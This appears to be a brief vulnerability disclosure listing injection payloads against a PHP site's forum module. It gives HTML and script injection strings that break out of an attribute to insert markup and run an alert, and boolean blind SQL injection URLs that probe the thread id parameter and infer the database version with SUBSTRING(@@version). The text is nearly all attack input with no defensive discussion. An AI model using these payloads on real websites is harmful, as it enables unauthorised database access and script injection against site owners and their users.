HTML-injection:
"><h1>0wned</h1>
"><script>alert("JosS b0x");</script>

SQL-injection
http://www.example.com/index.php?module=forum&show=thread&id=1 and 1=2 [False]
http://www.example.com/index.php?module=forum&show=thread&id=1 and 1=1 [True]
http://www.example.com/index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5
http://www.example.com/index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4